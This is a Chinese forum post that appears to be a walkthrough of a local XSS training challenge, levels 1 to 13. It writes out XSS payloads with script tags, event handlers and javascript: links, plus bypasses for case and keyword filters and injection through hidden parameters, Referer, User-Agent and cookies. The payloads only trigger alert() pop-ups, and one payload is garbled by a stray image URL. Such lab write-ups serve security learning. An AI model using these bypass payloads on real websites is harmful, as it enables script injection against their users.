黑盒:xss挑战解题 - 第1题
- 第2题
- 第3题
- 第4题
- 第5题
- 第6题
- 第7题
- 第8题
- 第9题
- 第10题
- 第11题
- 第12题
- 第13题
第1题 我这里使用的是本地xsschallenge,你也可以玩在线版的,地址
1: 打开xsschallenge,发现长这样
XSSchallenge(1-13题)
2: 点击一下图片,来到了第一题
XSSchallenge(1-13题)
3: 把test替换为
<sCr<scrscRiptipt>ipt>OonN\'\"<>
XSSchallenge(1-13题)
会发现文本没有被过滤,那就直接上xss
4:再次修改test的内容为
<script>alert(/xss/)</script>
点击“确定”进入第2关
XSSchallenge(1-13题)
补充:一个作弊的方式,如何一口气通关所有关卡
在控制台输入javascript:alert(/xss/)
XSSchallenge(1-13题)
第2题 首先看到第二题长这个样子
XSSchallenge(1-13题)
1:先来万能模板试一把,把URL里的test替换为如下内容
URL里的内容
http://10.3.139.51/xsschallenge/level2.php?keyword=test
<sCr<scrscRiptipt>ipt>OonN\'\"<>
XSSchallenge(1-13题)
2:构造payload
"><script>alert(/xss/)</script>
XSSchallenge(1-13题)
第3题 来一个<script " 'Oonn>
XSSchallenge(1-13题)
“检查元素”发现内容点奇怪,查看页面源代码
XSSchallenge(1-13题)
发现左右尖括号被编码了,但是单引号没有被转码!
输入以下内容'onmouseover='alert(/xss/)
第一个单引号是闭合前面的单号,第二个单引号是为了闭合后面的单引号,构造出事件驱动,此时“查看页面源代码”
XSSchallenge(1-13题)
当你把鼠标放在搜索框中时,会出现弹窗
XSSchallenge(1-13题)
第4题
XSSchallenge(1-13题)
来一个<script " 'Oonn>
接着查看页面源代码
XSSchallenge(1-13题)
发现跟第3题没啥区别,把单引号换成双引号就OK
输入以下内容"onmouseover="alert(/xss/)
查看页面源代码
XSSchallenge(1-13题)
当你把鼠标放在搜索框时,nice
XSSchallenge(1-13题)
第5题
XSSchallenge(1-13题)
来一个<script " 'Oonn>
接着查看页面源代码
XSSchallenge(1-13题)
下面来改造一下测试代码<script script " 'Oonn>
发现跟上一步的结果差不多,仍然是大写变小写,关键字中间过滤(过滤一次),没有过滤单双引号
XSSchallenge(1-13题)
重新构造一下payload,使用伪协议的方式来构造xss
"><a href = "javascript:alert:alert(/xss/)">click me</a>
XSSchallenge(1-13题)
查看一下页面源代码
XSSchallenge(1-13题)
鼠标点击“click me”按钮,成功
XSSchallenge(1-13题)
第6题
XSSchallenge(1-13题)
来一个<script " 'Oonn>
接着查看页面源代码
XSSchallenge(1-13题)
发现没有做大小写过滤,没有过滤单双引号,只过滤了关键字
尝试第5题中的伪协议 "><a href = "javascript:alert:alert(/xss/)">click me</a>
XSSchallenge(1-13题)
查看页面源代码,发现href被过滤了
XSSchallenge(1-13题)
记得前面没有过滤大小写,修改一下payload
"><a hREf = "javascript:alert:alert(/xss/)">click me</a>
XSSchallenge(1-13题)
鼠标点击一下,成功了
XSSchallenge(1-13题)
同样还是可以通过大小写策略,使用事件驱动方式触发xss
"Onmouseover="alert(/xss/)
XSSchallenge(1-13题)
综上,根据只要绕过大小写的策略,你可以写出如下payload 1. "> <Script>alert(/xss/)</script>
2. "> <img Src=666 OnError=alert(/xss/)>
3. "><a hREf = "javascript:alert:alert(/xss/)">click me</a>
4. "Onmouseover="alert(/xss/)
……
XSSchallenge(1-13题)
来一个<script " 'OOnn>
接着查看页面源代码
XSSchallenge(1-13题)
发现:
1:script被过滤了,on还剩一个,猜测只做一次关键字过滤
2:单双引号没有被过滤
那么复写关键字两次就行了,so easy
代码可以抄上一题的,复写两次就行,举个例子 "Oonnmouseover="alert(/xss/)
XSSchallenge(1-13题)
第8题
XSSchallenge(1-13题)
来一个<script " 'Oonn>
接着查看页面源代码
XSSchallenge(1-13题)
首先考虑伪协议尝试绕过 当鼠标放在“友情链接”上时,发现左下角的URL不对劲
XSSchallenge(1-13题)
问题不大,对标签页属性进行16进制ASCII编码,再次尝试绕过
当鼠标放在“友情链接”上时,左下角显示正常
XSSchallenge(1-13题)
成功过关
XSSchallenge(1-13题)
第9题
XSSchallenge(1-13题)
既然仍然是友情链接,先尝试上一题的答案 结果被提示链接不合法
XSSchallenge(1-13题)
那我就先写一个正确的链接
左下角果然提示正常
XSSchallenge(1-13题)
猜测一下,把payload里面的弹窗改为百度
javascript:alert('http://baidu.com')
XSSchallenge(1-13题)
顺利通过
XSSchallenge(1-13题)
第10题
XSSchallenge(1-13题)
把URL栏里面的keyword替换为<script " 'Oonn>
XSSchallenge(1-13题)
接着查看页面源代码:
XSSchallenge(1-13题)
发现,除了我们输进去的代码被二次编码了以外,页面中还有三个隐藏的元素,并且隐藏的元素的值为空。那么首先考虑能不能搞一下这三个元素,方式是通过手动传参。于是URL栏里的地址尝试下面的三个 10.3.139.102/xsschallenge/level10.php?t_link=1
10.3.139.102/xsschallenge/level10.php?t_history=1
10.3.139.102/xsschallenge/level10.php?t_sort=1
10.3.139.102/xsschallenge/level10.php?t_sort=<script " 'Oonn>
XSSchallenge(1-13题)
有戏,接下来就是填字游戏了
【如果直接复制下面代码执行失败,请尝试手动写入】
10.3.139.102/xsschallenge/level10.php?t_sort=click me!" type="button" οnclick="alert(/xss/)
XSSchallenge(1-13题)
点一下“click me”按钮,顺利过关
XSSchallenge(1-13题)
第11题
XSSchallenge(1-13题)
把URL栏里面的keyword替换为<script " 'Oonn>
接着查看一下页面源代码,发现跟第10题相似,那就先按照第10题的思路试试
XSSchallenge(1-13题)
那么隐藏元素走一波 10.3.139.102/xsschallenge/level11.php?t_link=<script " 'Oonn>
10.3.139.102/xsschallenge/level11.php?t_history=<script " 'Oonn>
10.3.139.102/xsschallenge/level11.php?t_sort=<script " 'Oonn>
10.3.139.102/xsschallenge/level11.php?t_ref=<script " 'Oonn>
XSSchallenge(1-13题)
那么再玩一次填字游戏,尝试第3题的思路
10.3.139.102/xsschallenge/level11.php?t_sort="οnmοuseοver='alert(/xss/)'"
XSSchallenge(1-13题)
那么再回过头来搞搞"t_ref"字段,其实查一下文件源代码发现那四行隐藏元素的内容是这样写的:
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">
XSSchallenge(1-13题)
查看页面源代码,有戏,跟第10题的套路一样了,那么可以直接拿第10题的答案来套
XSSchallenge(1-13题)
修改一下Referer字段,然后就过关了。
XSSchallenge(1-13题)
XSSchallenge(1-13题)
第12题
XSSchallenge(1-13题)
先来查看一下页面源代码
XSSchallenge(1-13题)
看到第20行写有浏览器的指纹,啥也别说了,先搞第20行
XSSchallenge(1-13题)
首先按F12召唤“查看元素”,然后刷新页面,就会看到网络数据,当你用鼠标选中第一条数据时,右边会显示出详细通信内容,点击一下“重发”按钮,就能重新编辑数据包了
XSSchallenge(1-13题)
把指纹部分改成测试代码<script " 'Oonn>
XSSchallenge(1-13题)
发送完数据之后,来查看一下页面源代码,发现还是那个样,显示的还是指纹信息
XSSchallenge(1-13题)
那就接着使用“查看元素“吧,有戏。
XSSchallenge(1-13题)
使用上一题的答案click me!" type="button"https://img-blog.csdnimg.cn/2020080716325411.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDI4ODYwNA==,size_16,color_FFFFFF,t_70" border="0">
看起来是成功了,但是为什么页面没有按钮呢???
XSSchallenge(1-13题)
再来看看”检查元素”,payload设置正常
XSSchallenge(1-13题)
看一下“预览”,点击按钮无果
XSSchallenge(1-13题)
此路不行,另觅他法,不就是改包嘛!!!
XSSchallenge(1-13题)
走BurpSuite代理,BurpSuite开启截断,然后“Forward“,顺利出现按钮,点一下,过关
XSSchallenge(1-13题)
第13题
XSSchallenge(1-13题)
首先查看一下页面源代码
XSSchallenge(1-13题)
猜测,第20行应该是cookie,应该是从它下手,根据上一题的惨痛教训,这次直接使用BurpSuite。劫持会话更改cookie
XSSchallenge(1-13题)
XSSchallenge(1-13题)
| 
发表于 2021-3-25 11:27:08
|
查看: 3358|
回复: 0
窥视卡
雷达卡
提升卡
置顶卡
关闭卡
开启卡
变色卡
千斤顶
照妖镜